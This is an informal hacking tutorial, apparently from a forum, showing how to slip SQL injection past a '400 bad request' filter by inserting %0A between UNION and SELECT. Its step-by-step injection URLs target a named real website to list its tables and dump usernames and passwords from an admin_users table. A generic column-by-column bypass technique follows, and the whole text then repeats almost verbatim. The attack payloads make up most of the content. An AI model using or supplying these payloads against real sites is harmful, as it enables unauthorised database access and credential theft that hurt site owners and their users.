# 400 bad request #
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears
( it’s mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) : ![[IMG]](https://i0.wp.com/i49.tinypic.com/20fqnlu.png)
Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1‘ union select group_concat(table_name)from information_schema.tables where table_schema=database()–+
First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :![[IMG]](https://i0.wp.com/i46.tinypic.com/2rco7xg.png)
Link : www.krumplitas.lt/index2.php?id=-1‘ union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()–+
And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 ………)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)–+
![[IMG]](https://i0.wp.com/i50.tinypic.com/iyq8ut.png)
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users–+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :![[IMG]](https://i0.wp.com/i48.tinypic.com/2zjgg74.png)
But sometimes you also need to know where error begins! for example website have 20 columns… for example :
site.com/something.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+–+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1‘ union ( no error )
site.com/somthing.php?id=1‘ union select 1 +–+/ ( still no error )
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12+–+/ ( still no error )
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13+–+/ ( And error! ) so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13–+%0A,14–+%0A,15–+%0A,16–+%0A,17–+%0A,18–+%0A,19–+%0A,20–+%0A–+
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears
( it’s mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) : Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1‘ union select group_concat(table_name)from information_schema.tables where table_schema=database()–+First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :
Link : www.krumplitas.lt/index2.php?id=-1‘ union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()–+And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 ………)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)–+
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users–+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :
But sometimes you also need to know where error begins! for example website have 20 columns… for example :
site.com/something.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+–+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1‘ union ( no error )
site.com/somthing.php?id=1‘ union select 1 +–+/ ( still no error )
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12+–+/ ( still no error )
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13+–+/ ( And error! )
So we know error starts at 13… so then you just add
13–+%0A,14–+%0A,15–+%0A untill you write all your columns so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13–+%0A,14–+%0A,15–+%0A,16–+%0A,17–+%0A,18–+%0A,19–+%0A,20–+%0A–+
WHITE HAT HACKER 